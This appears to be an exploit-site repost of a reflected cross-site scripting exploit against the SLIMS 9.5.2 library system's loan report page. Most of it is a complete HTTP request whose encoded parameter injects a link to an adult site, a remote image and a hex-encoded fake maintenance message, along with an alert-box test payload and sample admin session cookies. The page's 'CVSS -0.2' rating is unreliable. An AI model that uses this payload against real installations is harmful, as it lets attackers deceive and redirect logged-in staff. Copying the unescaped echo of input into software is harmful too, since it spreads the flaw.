Exploit for SLIMS 9.5.2 Cross Site Scripting

Name: Exploit for SLIMS 9.5.2 Cross Site Scripting
Rating: 5 (169 reviews)
2023-01-19 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:170596
## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit  
## Development: nu11secur1ty  
## Date: 01.19.2023  
## Vendor: https://slims.web.id/web/  
## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2  
  
## Description:  
The value of manual insertion `point 3` is copied into the HTML  
document as plain text between tags.  
The payload udz21<script>alert(1)</script>rk346 was submitted in  
manual insertion point 3.  
This input was echoed unmodified in the application's response.  
The attacker can trick the already logged-in user, to visit the  
exploit link that this attacker is created,  
and if this already logged-in user is not actually IT or admin, this  
will be the end of this system.  
  
  
## STATUS: HIGH Vulnerability  
  
[+] Exploit:  
```  
GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27  
HTTP/1.1  
Host: pwnedhost1.com  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)  
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107  
Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;  
SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4  
Connection: close  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)  
  
## Proof and Exploit:  
[href](https://streamable.com/zd6e18)  
  
## Reference:  
[href](https://portswigger.net/web-security/cross-site-scripting)